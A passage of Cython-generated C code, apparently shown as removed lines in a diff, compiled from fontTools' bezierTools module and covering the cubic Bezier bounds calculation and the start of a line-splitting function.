__pyx_t_9; - __pyx_t_9 = 0; - __pyx_v_dy = __pyx_t_7; - __pyx_t_7 = 0; - - /* "fontTools/misc/bezierTools.py":432 - * (ax, ay), (bx, by), (cx, cy), (dx, dy) = calcCubicParameters(pt1, pt2, pt3, pt4) - * # calc first derivative - * ax3 = ax * 3.0 # <<<<<<<<<<<<<< - * ay3 = ay * 3.0 - * bx2 = bx * 2.0 - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_ax, __pyx_float_3_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 432, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_ax3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":433 - * # calc first derivative - * ax3 = ax * 3.0 - * ay3 = ay * 3.0 # <<<<<<<<<<<<<< - * bx2 = bx * 2.0 - * by2 = by * 2.0 - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_ay, __pyx_float_3_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 433, __pyx_L1_error) - 
__Pyx_GOTREF(__pyx_t_1); - __pyx_v_ay3 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":434 - * ax3 = ax * 3.0 - * ay3 = ay * 3.0 - * bx2 = bx * 2.0 # <<<<<<<<<<<<<< - * by2 = by * 2.0 - * xRoots = [t for t in solveQuadratic(ax3, bx2, cx) if 0 <= t < 1] - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_bx, __pyx_float_2_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 434, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_bx2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":435 - * ay3 = ay * 3.0 - * bx2 = bx * 2.0 - * by2 = by * 2.0 # <<<<<<<<<<<<<< - * xRoots = [t for t in solveQuadratic(ax3, bx2, cx) if 0 <= t < 1] - * yRoots = [t for t in solveQuadratic(ay3, by2, cy) if 0 <= t < 1] - */ - __pyx_t_1 = PyNumber_Multiply(__pyx_v_by, __pyx_float_2_0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 435, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_by2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":436 - * bx2 = bx * 2.0 - * by2 = by * 2.0 - * xRoots = [t for t in solveQuadratic(ax3, bx2, cx) if 0 <= t < 1] # <<<<<<<<<<<<<< - * yRoots = [t for t in solveQuadratic(ay3, by2, cy) if 0 <= t < 1] - * roots = xRoots + yRoots - */ - { /* enter inner scope */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_solveQuadratic); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_5))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_5); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_5, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_v_ax3, __pyx_v_bx2, __pyx_v_cx}; - __pyx_t_6 = __Pyx_PyObject_FastCall(__pyx_t_5, 
__pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - } - if (likely(PyList_CheckExact(__pyx_t_6)) || PyTuple_CheckExact(__pyx_t_6)) { - __pyx_t_5 = __pyx_t_6; __Pyx_INCREF(__pyx_t_5); - __pyx_t_11 = 0; - __pyx_t_12 = NULL; - } else { - __pyx_t_11 = -1; __pyx_t_5 = PyObject_GetIter(__pyx_t_6); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_12 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_5); if (unlikely(!__pyx_t_12)) __PYX_ERR(0, 436, __pyx_L15_error) - } - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - for (;;) { - if (likely(!__pyx_t_12)) { - if (likely(PyList_CheckExact(__pyx_t_5))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_5); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 436, __pyx_L15_error) - #endif - if (__pyx_t_11 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_6 = PyList_GET_ITEM(__pyx_t_5, __pyx_t_11); __Pyx_INCREF(__pyx_t_6); __pyx_t_11++; if (unlikely((0 < 0))) __PYX_ERR(0, 436, __pyx_L15_error) - #else - __pyx_t_6 = __Pyx_PySequence_ITEM(__pyx_t_5, __pyx_t_11); __pyx_t_11++; if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_GOTREF(__pyx_t_6); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_5); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 436, __pyx_L15_error) - #endif - if (__pyx_t_11 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_6 = PyTuple_GET_ITEM(__pyx_t_5, __pyx_t_11); __Pyx_INCREF(__pyx_t_6); __pyx_t_11++; if (unlikely((0 < 0))) __PYX_ERR(0, 436, __pyx_L15_error) - #else - __pyx_t_6 = __Pyx_PySequence_ITEM(__pyx_t_5, __pyx_t_11); __pyx_t_11++; if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 436, 
__pyx_L15_error) - __Pyx_GOTREF(__pyx_t_6); - #endif - } - } else { - __pyx_t_6 = __pyx_t_12(__pyx_t_5); - if (unlikely(!__pyx_t_6)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 436, __pyx_L15_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_6); - } - __Pyx_XDECREF_SET(__pyx_8genexpr1__pyx_v_t, __pyx_t_6); - __pyx_t_6 = 0; - __pyx_t_6 = PyObject_RichCompare(__pyx_int_0, __pyx_8genexpr1__pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 436, __pyx_L15_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_6)) { - __Pyx_DECREF(__pyx_t_6); - __pyx_t_6 = PyObject_RichCompare(__pyx_8genexpr1__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 436, __pyx_L15_error) - } - __pyx_t_13 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_13 < 0))) __PYX_ERR(0, 436, __pyx_L15_error) - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (__pyx_t_13) { - if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_8genexpr1__pyx_v_t))) __PYX_ERR(0, 436, __pyx_L15_error) - } - } - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_XDECREF(__pyx_8genexpr1__pyx_v_t); __pyx_8genexpr1__pyx_v_t = 0; - goto __pyx_L20_exit_scope; - __pyx_L15_error:; - __Pyx_XDECREF(__pyx_8genexpr1__pyx_v_t); __pyx_8genexpr1__pyx_v_t = 0; - goto __pyx_L1_error; - __pyx_L20_exit_scope:; - } /* exit inner scope */ - __pyx_v_xRoots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":437 - * by2 = by * 2.0 - * xRoots = [t for t in solveQuadratic(ax3, bx2, cx) if 0 <= t < 1] - * yRoots = [t for t in solveQuadratic(ay3, by2, cy) if 0 <= t < 1] # <<<<<<<<<<<<<< - * roots = xRoots + yRoots - * - */ - { /* enter inner scope */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_6, 
__pyx_n_s_solveQuadratic); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_6))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_6); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_6, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_v_ay3, __pyx_v_by2, __pyx_v_cy}; - __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - } - if (likely(PyList_CheckExact(__pyx_t_5)) || PyTuple_CheckExact(__pyx_t_5)) { - __pyx_t_6 = __pyx_t_5; __Pyx_INCREF(__pyx_t_6); - __pyx_t_11 = 0; - __pyx_t_12 = NULL; - } else { - __pyx_t_11 = -1; __pyx_t_6 = PyObject_GetIter(__pyx_t_5); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_12 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); if (unlikely(!__pyx_t_12)) __PYX_ERR(0, 437, __pyx_L23_error) - } - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - for (;;) { - if (likely(!__pyx_t_12)) { - if (likely(PyList_CheckExact(__pyx_t_6))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_6); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 437, __pyx_L23_error) - #endif - if (__pyx_t_11 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_5 = PyList_GET_ITEM(__pyx_t_6, __pyx_t_11); __Pyx_INCREF(__pyx_t_5); __pyx_t_11++; if (unlikely((0 < 0))) __PYX_ERR(0, 437, __pyx_L23_error) - #else - __pyx_t_5 = __Pyx_PySequence_ITEM(__pyx_t_6, __pyx_t_11); __pyx_t_11++; if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 437, __pyx_L23_error) - 
__Pyx_GOTREF(__pyx_t_5); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_6); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 437, __pyx_L23_error) - #endif - if (__pyx_t_11 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_5 = PyTuple_GET_ITEM(__pyx_t_6, __pyx_t_11); __Pyx_INCREF(__pyx_t_5); __pyx_t_11++; if (unlikely((0 < 0))) __PYX_ERR(0, 437, __pyx_L23_error) - #else - __pyx_t_5 = __Pyx_PySequence_ITEM(__pyx_t_6, __pyx_t_11); __pyx_t_11++; if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - } - } else { - __pyx_t_5 = __pyx_t_12(__pyx_t_6); - if (unlikely(!__pyx_t_5)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 437, __pyx_L23_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_5); - } - __Pyx_XDECREF_SET(__pyx_8genexpr2__pyx_v_t, __pyx_t_5); - __pyx_t_5 = 0; - __pyx_t_5 = PyObject_RichCompare(__pyx_int_0, __pyx_8genexpr2__pyx_v_t, Py_LE); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 437, __pyx_L23_error) - if (__Pyx_PyObject_IsTrue(__pyx_t_5)) { - __Pyx_DECREF(__pyx_t_5); - __pyx_t_5 = PyObject_RichCompare(__pyx_8genexpr2__pyx_v_t, __pyx_int_1, Py_LT); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 437, __pyx_L23_error) - } - __pyx_t_13 = __Pyx_PyObject_IsTrue(__pyx_t_5); if (unlikely((__pyx_t_13 < 0))) __PYX_ERR(0, 437, __pyx_L23_error) - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - if (__pyx_t_13) { - if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_8genexpr2__pyx_v_t))) __PYX_ERR(0, 437, __pyx_L23_error) - } - } - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_XDECREF(__pyx_8genexpr2__pyx_v_t); __pyx_8genexpr2__pyx_v_t = 0; - goto __pyx_L28_exit_scope; - __pyx_L23_error:; - __Pyx_XDECREF(__pyx_8genexpr2__pyx_v_t); 
__pyx_8genexpr2__pyx_v_t = 0; - goto __pyx_L1_error; - __pyx_L28_exit_scope:; - } /* exit inner scope */ - __pyx_v_yRoots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":438 - * xRoots = [t for t in solveQuadratic(ax3, bx2, cx) if 0 <= t < 1] - * yRoots = [t for t in solveQuadratic(ay3, by2, cy) if 0 <= t < 1] - * roots = xRoots + yRoots # <<<<<<<<<<<<<< - * - * points = [ - */ - __pyx_t_1 = PyNumber_Add(__pyx_v_xRoots, __pyx_v_yRoots); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 438, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_roots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":446 - * ) - * for t in roots - * ] + [pt1, pt4] # <<<<<<<<<<<<<< - * return calcBounds(points) - * - */ - { /* enter inner scope */ - - /* "fontTools/misc/bezierTools.py":440 - * roots = xRoots + yRoots - * - * points = [ # <<<<<<<<<<<<<< - * ( - * ax * t * t * t + bx * t * t + cx * t + dx, - */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 440, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":445 - * ay * t * t * t + by * t * t + cy * t + dy, - * ) - * for t in roots # <<<<<<<<<<<<<< - * ] + [pt1, pt4] - * return calcBounds(points) - */ - __pyx_t_6 = __pyx_v_roots; __Pyx_INCREF(__pyx_t_6); - __pyx_t_11 = 0; - for (;;) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_6); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 445, __pyx_L31_error) - #endif - if (__pyx_t_11 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_5 = PyList_GET_ITEM(__pyx_t_6, __pyx_t_11); __Pyx_INCREF(__pyx_t_5); __pyx_t_11++; if (unlikely((0 < 0))) __PYX_ERR(0, 445, __pyx_L31_error) - #else - __pyx_t_5 = __Pyx_PySequence_ITEM(__pyx_t_6, __pyx_t_11); __pyx_t_11++; if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 445, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - 
__Pyx_XDECREF_SET(__pyx_8genexpr3__pyx_v_t, __pyx_t_5); - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":442 - * points = [ - * ( - * ax * t * t * t + bx * t * t + cx * t + dx, # <<<<<<<<<<<<<< - * ay * t * t * t + by * t * t + cy * t + dy, - * ) - */ - __pyx_t_5 = PyNumber_Multiply(__pyx_v_ax, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_5, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = PyNumber_Multiply(__pyx_t_3, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Multiply(__pyx_v_bx, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_3, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_5, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_v_cx, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_5 = PyNumber_Add(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_5, __pyx_v_dx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* 
"fontTools/misc/bezierTools.py":443 - * ( - * ax * t * t * t + bx * t * t + cx * t + dx, - * ay * t * t * t + by * t * t + cy * t + dy, # <<<<<<<<<<<<<< - * ) - * for t in roots - */ - __pyx_t_5 = PyNumber_Multiply(__pyx_v_ay, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_5, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = PyNumber_Multiply(__pyx_t_3, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Multiply(__pyx_v_by, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = PyNumber_Multiply(__pyx_t_3, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Add(__pyx_t_5, __pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_7 = PyNumber_Multiply(__pyx_v_cy, __pyx_8genexpr3__pyx_v_t); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_5 = PyNumber_Add(__pyx_t_3, __pyx_t_7); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_7 = PyNumber_Add(__pyx_t_5, __pyx_v_dy); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 443, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":442 - * points = [ - * ( - * ax * t * t * t + bx * t * t + cx * t + dx, # 
<<<<<<<<<<<<<< - * ay * t * t * t + by * t * t + cy * t + dy, - * ) - */ - __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 442, __pyx_L31_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_2)) __PYX_ERR(0, 442, __pyx_L31_error); - __Pyx_GIVEREF(__pyx_t_7); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_7)) __PYX_ERR(0, 442, __pyx_L31_error); - __pyx_t_2 = 0; - __pyx_t_7 = 0; - if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_t_5))) __PYX_ERR(0, 440, __pyx_L31_error) - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":445 - * ay * t * t * t + by * t * t + cy * t + dy, - * ) - * for t in roots # <<<<<<<<<<<<<< - * ] + [pt1, pt4] - * return calcBounds(points) - */ - } - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_XDECREF(__pyx_8genexpr3__pyx_v_t); __pyx_8genexpr3__pyx_v_t = 0; - goto __pyx_L35_exit_scope; - __pyx_L31_error:; - __Pyx_XDECREF(__pyx_8genexpr3__pyx_v_t); __pyx_8genexpr3__pyx_v_t = 0; - goto __pyx_L1_error; - __pyx_L35_exit_scope:; - } /* exit inner scope */ - - /* "fontTools/misc/bezierTools.py":446 - * ) - * for t in roots - * ] + [pt1, pt4] # <<<<<<<<<<<<<< - * return calcBounds(points) - * - */ - __pyx_t_6 = PyList_New(2); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 446, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_6, 0, __pyx_v_pt1)) __PYX_ERR(0, 446, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt4); - __Pyx_GIVEREF(__pyx_v_pt4); - if (__Pyx_PyList_SET_ITEM(__pyx_t_6, 1, __pyx_v_pt4)) __PYX_ERR(0, 446, __pyx_L1_error); - __pyx_t_5 = PyNumber_Add(__pyx_t_1, __pyx_t_6); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 446, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_v_points = ((PyObject*)__pyx_t_5); - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":447 - 
* for t in roots - * ] + [pt1, pt4] - * return calcBounds(points) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_calcBounds); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 447, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_1 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_6))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_6); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_6, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_points}; - __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 447, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - } - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":412 - * - * - * def calcCubicBounds(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a cubic Bezier segment. 
- * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicBounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_dx); - __Pyx_XDECREF(__pyx_v_dy); - __Pyx_XDECREF(__pyx_v_ax3); - __Pyx_XDECREF(__pyx_v_ay3); - __Pyx_XDECREF(__pyx_v_bx2); - __Pyx_XDECREF(__pyx_v_by2); - __Pyx_XDECREF(__pyx_v_xRoots); - __Pyx_XDECREF(__pyx_v_yRoots); - __Pyx_XDECREF(__pyx_v_roots); - __Pyx_XDECREF(__pyx_v_points); - __Pyx_XDECREF(__pyx_8genexpr1__pyx_v_t); - __Pyx_XDECREF(__pyx_8genexpr2__pyx_v_t); - __Pyx_XDECREF(__pyx_8genexpr3__pyx_v_t); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":450 - * - * - * def splitLine(pt1, pt2, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a line at a given coordinate. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_25splitLine(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_24splitLine, "splitLine(pt1, pt2, where, isHorizontal)\nSplit a line at a given coordinate.\n\n Args:\n pt1: Start point of line as 2D tuple.\n pt2: End point of line as 2D tuple.\n where: Position at which to split the line.\n isHorizontal: Direction of the ray splitting the line. 
